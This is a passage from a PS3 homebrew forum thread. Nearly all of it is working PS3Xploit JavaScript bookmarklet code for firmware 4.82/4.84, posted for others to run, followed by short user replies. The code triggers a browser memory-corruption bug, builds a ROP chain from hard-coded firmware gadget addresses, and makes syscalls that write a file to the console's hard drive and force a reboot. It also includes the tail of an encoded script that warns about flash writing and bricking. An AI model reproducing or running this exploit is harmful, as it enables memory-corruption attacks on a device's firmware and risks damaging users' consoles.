sYWNlfGNvbXxPcmlnaW5hbHxzY3JpcHR8VGVhbXxlc2MwcnRkM3d8Ymd1ZXJ2aWxsZXxoYWJpYnxTb3VyY2V8MDAwfDAwMXxoZGR8ZmwxfGZsMnxiZGR8RGVzdGluYXRpb258ZGQwfHUwMHx1MDF8ZGYxfGRmMnxjaGVja2JveHxhcmVib290fEF1dG98UmVib290fGFjdGlvbnxidXR0b258SW5pdGlhbGl6ZXxvbmNsaWNrfGJvZHl8YWxlcnR8V0FSTklOR3xXcml0aW5nfGZsYXNofGlzfGRhbmdlcm91c3xhbmR8Y2FufGxlYWR8cG90ZW50aWFsfGJyaWNrfEluZXhwZXJpZW5jZWR8dXNlcnN8c2hvdWxkfG5vdHxwcm9jZWVkfGdldEVsZW1lbnRzQnlUYWdOYW1lfElOUFVUfGRpc2FibGVkfGluZGV4T2Z8aWxlfGF1dG9fY2xvc2V8d2luZG93fGNsb3NlfDB4MTh8MHhCMHxyZWJvb3RfZnJhbWV8c2VsZWN0ZWRJbmRleHxvcHRpb25zfHNwbGl0fGVFfHJldmVyc2V8TmFOfEluZmluaXR5fGxvY2FsfHBhcnNlRmxvYXR8TkFOfGZmZmZlfDEwMHwweDJ8YnJlYWt8c3RvcmVfd29yZHwweEM3NHx1MkEyRnx1MkYyQXx0cnl8MHg4MDIwMDAwMHwweDhCMjAwMDAwfHVGRDdFfDB4N0VGRHwweDN8MHhCfDB4MkEyRnx1MDEwMnx1N0VGQnwweDMwfDB4ODI4Mnx1RkI3RXwweDdFRkJ8dTdFRkF8dUZBN0V8MHg3RUZBfHwweDgwMDB8Y2F0Y2h8MjAwMHxncmVlbnxzdWNjZXNzZnVsfHJlZCcuc3BsaXQoJ3wnKSwwLHt9KSk="));Rebuild database (new):
Code:
javascript:eval('var xtra_data,stack_frame,jump_2,jump_1,xtra_data_addr,stack_frame_addr,jump_2_addr,jump_1_addr,debug=!1,ps3xploit_ecdsa_key="948DA13E8CAFD5BA0E90CE434461BB327FE7E080475EAA0AD3AD4F5B6247A7FDA86DF69790196773",index_key="DA7D4B5E499A4F53B1C1A14A7484443B",start_x="xxxx",offset_array=[],t_out=0,ps3xploit_ecdsa_key_addr=0,index_key_addr=0,search_max_threshold=73400320,search_base=2148532224,search_size=2*mbytes,search_base_off=0,search_size_ext=0,gtemp_addr=2365587456,total_loops=0,max_loops=20,frame_fails=0,sp_exit=2413354176,ffs=4294967295,dbyte41=16705,dbyte00=0,byte_size=1,hword_size=2,word_size=4,dword_size=8,mbytes=1048576,stat_size_offset=40,toc_addr=7296336,default_vsh_pub_toc=7263652,vsh_opd_patch=617820,vsh_opd_addr=7256936,vsh_ps3xploit_key_toc=7370612,toc_entry1_addr=7185360,toc_entry2_addr=7494200,toc_entry3_addr=7185352,toc_entry4_addr=7602176,toc_entry5_addr=7255744,toc_entry6_addr=0,gadget1_addr=620036,gadget2_addr=6332484,gadget3_addr=872540,gadget4_addr=2267192,gadget5_addr=1227548,gadget6_addr=6380604,gadget7_addr=131024,gadget8_addr=131072,soft_reboot=0x200,sc_sm_shutdown=0x17B,gadget12_addr=0x0C864C,sc_fs_open=0x321,gadget_mod4b_addr=0x42C778,fs_flag_create=0x241,fs_mode=0x1B6,sc_fs_write=0x323,sc_fs_close=0x324,gadget_mod1_addr=6352696,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,hr="\74hr\76",path_db_rebuild="/dev_hdd0/mms/db.err",db_rebuild_bytes=0x000003E9,ua=navigator.userAgent,fwv=ua.substring(ua.indexOf("5.0 (")+19,ua.indexOf(") Apple"));document.write(\47\74html\76\74head\76\74title\76PS3Xploit - Offline Database Rebuilder by lmn7\74/title\76\74/head\76\74body id="bodyId" style="background-color:#FFFFFF"\76\74div id="headerId"\76\74h1\76Rebuilding database...\74/h1\76\74span id="hideme" style="visibility:hidden"\76\74p\76\74button id="btnROP" type="button" onclick="initROP(true);" autofocus\76Initialize\74/button\76 | Close \74input type="checkbox" id="auto_close" name="aclose" checked="checked" onclick="autoclose();"/\76\74span id="dex_txt" style="visibility:hidden"\76\74input type="checkbox" id="dex" name="DEX" disabled="" onclick="dex();"/\76\74/span\76\74/p\76\74p\76\74button id="btnTrigger" disabled="" type="button" onclick="triggerX();"\76En\74/button\76\74span id="reset" style="visibility:hidden"\76 | \74button id="btnReset" type="button" onclick="disable_trigger();"\76Reset\74/button\76\74/span\76\74/p\76\74/span\76\74div id="exploit" \76\74/div\76\74div id="trigger"\76\74/div\76\74/body\76\74/html\76\47);if(fwv=="4.84"){var toc_addr=7296344,default_vsh_pub_toc=7263660,vsh_opd_patch=617820,vsh_opd_addr=7256944,vsh_toc_addr_screenshot=7472764,vsh_ps3xploit_key_toc=7370860,toc_entry1_addr=7185360,toc_entry2_addr=7494456,toc_entry3_addr=7185352,toc_entry4_addr=7602176,toc_entry5_addr=7255752,toc_entry6_addr=0,gadget1_addr=620036,gadget2_addr=6332644,gadget3_addr=872540,gadget4_addr=2267192,gadget5_addr=1227548,gadget6_addr=6380764,gadget7_addr=131024,gadget8_addr=131072,gadget9_addr=170760,gadget10_addr=6479908,gadget11_addr=5874864,gadget12_addr=820812,gadget13_addr=4777384,gadget14_addr=4769696,gadget15_addr=4758664,gadget_mod1_addr=6352856,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod4b_addr=4376440,gadget_mod4c_addr=346864,gadget_mod5_addr=4339932,gadget_mod6_addr=134144,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,gadget_mod9_addr=68384,gadget_mod10_addr=1857428,gadget_mod11_addr=1618244,gadget_mod12_addr=6500860,gadget_mod13_addr=3369072,gadget_mod14_addr=6502656,gadget_mod15_addr=3788856,gadget_mod16_addr=5206828}function syscall_r3_p2p(a,b,c,d,e,f,g,h,i,j){if(j===null){j=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(a)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4b_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(j)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function save_file_overwrite(a,b,c,d,e,f){return syscall(sc_fs_open,a,fs_flag_create,b,fs_mode,f,0,0,0)+syscall_r3_p2p(sc_fs_write,b,c,e,d,0,0,0,0,0,0)+syscall_r3_p2p(sc_fs_close,b,0,0,0,0,0,0,0,0,0)}function hexh2bin(a){return String.fromCharCode(a)}function hexw2bin(a){return String.fromCharCode(a\76\7616)+String.fromCharCode(a)}function hexdw2bin(a){return hexw2bin(0)+hexw2bin(a)}String.prototype.toHex16=function(){return(\470000\47+this).substr(-4)};String.prototype.toAscii=function(a){var b=\47\47;var i=0;while(i\74this.length){if(a===true){b+=this.charCodeAt(i).toString(16).toHex16()}else{b+=this.charCodeAt(i).toString(16)}i+=1}return b};String.prototype.convert=function(a){if(this.length\741){return\47\47}var b=\47\47;var c=\47\47;var i=0;var d=[];if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}while(i\74b.length){c=b.substr(i,4);d.push(String.fromCharCode(parseInt(c,16)));i+=4}return d.join(\47\47)};String.prototype.convertedSize=function(a){if(this.length\741){return 0}var b=\47\47;if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}return b.length/2};String.prototype.replaceAt=function(a,b){return this.substr(0,a)+b+this.substr(a+b.length)};String.prototype.repeat=function(a){return new Array(a+1).join(this)};Number.prototype.noExponents=function(){var a=String(this).split(/[eE]/);if(a.length===1){return a[0]}var z=\47\47,sign=this\740?\47-\47:\47\47,str=a[0].replace(\47.\47,\47\47),mag=Number(a[1])+1;if(mag\740){z=sign+\470.\47;while(mag++){z+=\470\47}return z+str.replace(/^\-/,\47\47)}mag-=str.length;while(mag--){z+=\470\47}return str+z};function fromIEEE754(a,b,c){var d=0;var g=[];var i;var j;var h;for(i=a.length;i;i-=1){h=a[i-1];for(j=8;j;j-=1){g.push(h%2?1:0);h=h\76\761}}g.reverse();var k=g.join(\47\47);var l=(1\74\74(b-1))-1;var s=parseInt(k.substring(0,1),2)?-1:1;var e=parseInt(k.substring(1,1+b),2);var f=parseInt(k.substring(1+b),2);if(e===(1\74\74b)-1){d=f!==0?NaN:s*Infinity}else if(e\760){d=s*Math.pow(2,e-l)*(1+f/Math.pow(2,c))}else if(f!==0){d=s*Math.pow(2,-(l-1))*(f/Math.pow(2,c))}else{d=s*0}return d.noExponents()}function generateIEEE754(a,b){var c=new Array((a\76\7624)&0xFF,(a\76\7616)&0xFF,(a\76\768)&0xFF,(a)&0xFF,(b\76\7624)&0xFF,(b\76\7616)&0xFF,(b\76\768)&0xFF,(b)&0xFF);return fromIEEE754(c,11,52)}function generateExploit(a,b){var n=(a\74\7432)|((b\76\761)-1);return generateIEEE754(a,(n-a))}function readMemory(a,b){if(document.getElementById(\47exploit\47)){document.getElementById(\47exploit\47).style.src="local("+generateExploit(a,b)+")"}}function checkMemory(a,b,c){if(document.getElementById(\47exploit\47)){readMemory(a,b);if(debug===true){var x=document.getElementById(\47exploit\47).style.src.substr(6,c);return x}return document.getElementById(\47exploit\47).style.src.substr(6,c)}}function trigger(a){if(document.getElementById(\47trigger\47)){document.getElementById("trigger").innerHTML=-parseFloat("NAN(ffffe"+a.toString(16)+")")}}function rop_exit(a){var b=document.getElementById(\47auto_close\47);if(b){if(b.checked===true)window.close()}}function load_check(){if(total_loops\74max_loops){t_out=setTimeout(initROP,1000,false)}else{total_loops=0;t_out=0}}function findJsVariableOffset(a,b,c,d){readMemory(c,d);var e=document.getElementById(\47exploit\47).style.src.substr(6,d);var i=0;var t;var k;var f;var g;while(i\74(e.length*2)){if(e.charCodeAt(i/2)===b.charCodeAt(0)){f=0;for(k=0;k\74(b.length*2);k+=0x2){if(e.charCodeAt((i+k)/2)!==b.charCodeAt(k/2)){break}f+=1}if(f===b.length){g=c+i+4;for(t=0;t\74offset_array.length;t+=1){if(offset_array[t]===g){return-1}}offset_array.push(g);return g}}i+=0x10}var h=c+d;return 0}function memcpy(a,b,c){return callsub(gadget8_addr,a,b,c,0,0,0,0,0,0,0x70)}function store_word(a,b,c,d,e){if(c===null){c=gtemp_addr}if(d===null){d=gtemp_addr}if(e===null){e=gtemp_addr}return hexdw2bin(gadget_mod3_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(b)+fill_by_8bytes(0x8,dbyte41)+hexdw2bin(a-0xC74)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod7_addr)+fill_by_16bytes(0x70,dbyte41)+hexdw2bin(c)+hexdw2bin(d)+hexdw2bin(e)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function stack_frame_hookup(){return unescape("\u4141\u2A2F")+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(toc_addr)+fill_by_16bytes(0x70,dbyte41)}function stack_frame_exit(){return hexdw2bin(gadget_mod8_addr)+unescape("\u2F2A")}function syscall(a,b,c,d,e,f,g,h,i,j){if(j===null){j=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(a)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4a_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(j)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function callsub(a,b,c,d,e,f,g,h,i,j,k,l,m){var n=0x20;if(m===null){m=gtemp_addr}if(l===null){l=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(j)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(l)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(a)+fill_by_16bytes(k-n,dbyte00)+hexdw2bin(m)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function fill_by_4bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/4){c+=e.repeat(2);d++}return c}function fill_by_8bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/8){c+=e.repeat(4);d++}return c}function fill_by_16bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/16){c+=e.repeat(8);d++}return c}function initDefaults(){offset_array=[];xtra_data_addr=0;stack_frame_addr=0;jump_2_addr=0;jump_1_addr=0;ps3xploit_ecdsa_key_addr=0;index_key_addr=0;search_max_threshold=70*0x100000;search_base=0x80100000;search_size=2*mbytes;search_size_ext=0*mbytes;search_base_off=0*mbytes;total_loops++}function initROP(a){try{if(a===true){frame_fails=0;search_base_off=0;search_size_ext=0}if(t_out!==0){clearTimeout(t_out);t_out=0}initDefaults();xtra_data=start_x.convert()+path_db_rebuild.convert()+hexw2bin(db_rebuild_bytes)+fill_by_16bytes(0x10,dbyte00)+unescape("\uFD7E");while(xtra_data_addr===0){if(search_max_threshold\74search_size){load_check();return}xtra_data=xtra_data.replaceAt(0,hexh2bin(0x7EFD));xtra_data_addr=findJsVariableOffset("xtra_data",xtra_data,search_base,search_size);search_max_threshold-=search_size}path_db_rebuild_addr=xtra_data_addr+0x2;db_rebuild_bytes_addr=path_db_rebuild_addr+path_db_rebuild.convertedSize();size_validate_addr=db_rebuild_bytes_addr+0x4;stack_frame=stack_frame_hookup()+save_file_overwrite(path_db_rebuild_addr,gtemp_addr-0x1000,db_rebuild_bytes_addr,gtemp_addr-0x5000,0x4,gtemp_addr-0x8000)+callsub(gadget12_addr,2,0,0,0,0,0,0,0,0,0x80)+syscall(sc_sm_shutdown,soft_reboot,0,0,0,0,0,0,0)+stack_frame_exit();while(stack_frame_addr===0){if(search_max_threshold\74search_size+search_size_ext){frame_fails++;if((frame_fails%10)===0){search_base_off+=0;search_size_ext+=0}load_check();return}stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+search_base_off,search_size+search_size_ext);if(stack_frame_addr==-1)if(search_max_threshold\74search_size+search_size_ext){frame_fails++;load_check();return}search_max_threshold-=search_size+search_size_ext}jump_2=unescape("\u0102\u7EFB")+fill_by_16bytes(0x30,0x8282)+hexw2bin(stack_frame_addr)+unescape("\uFB7E");while(jump_2_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);if(jump_2_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");while(jump_1_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);if(jump_1_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}var b=checkMemory(stack_frame_addr-0x4,0x8000,stack_frame.length);var x=checkMemory(xtra_data_addr-0x4,0x1000,xtra_data.length);var c=checkMemory(jump_2_addr-0x4,0x1000,jump_2.length);var d=checkMemory(jump_1_addr-0x4,0x1000,jump_1.length);if((c===jump_2)&&(d===jump_1)&&(x===xtra_data)&&(b===stack_frame)){if(t_out!==0){clearTimeout(t_out)}triggerX()}else{load_check()}}catch(e){}}function triggerX(){setTimeout(trigger,1000,jump_1_addr);setTimeout(rop_exit,2000,hr);setTimeout(window.close,2000);t_out=0;total_loops=0}initROP(true);');All scripts excluding the file copier will work on both 4.82 & 4.84 CEX. Some have been tested and some have not. Let me know if there's any issues.
Last edited:
citra mulia
Member
It works, thank you.
thanks for the hardwork lmn7.
anyway I repacked it again with lmn7's latest scripts and used shaolin' hantoolbox as template.
there are 2 file there, one is the simple han enabler which adds only the han enabler on xmb. very useful specially if the ps3 is used frequently by kids. otherwise the other one contains the latest scripts that lmn7 created.
anyway I repacked it again with lmn7's latest scripts and used shaolin' hantoolbox as template.
there are 2 file there, one is the simple han enabler which adds only the han enabler on xmb. very useful specially if the ps3 is used frequently by kids. otherwise the other one contains the latest scripts that lmn7 created.
Similar threads
-
-
PS3 PS3 CECHC04 From YLOD to GLOD - Particular Case
- Started by Alberto9898
- Replies: 3
-
PS3 2103A – Dropped console, delid, reflow and other- Started by Cheshire UK
- Replies: 11
-
PS3 Help! First time using SYSCON to fix my PS3 CECH-3001A
- Started by Lopandrade
- Replies: 0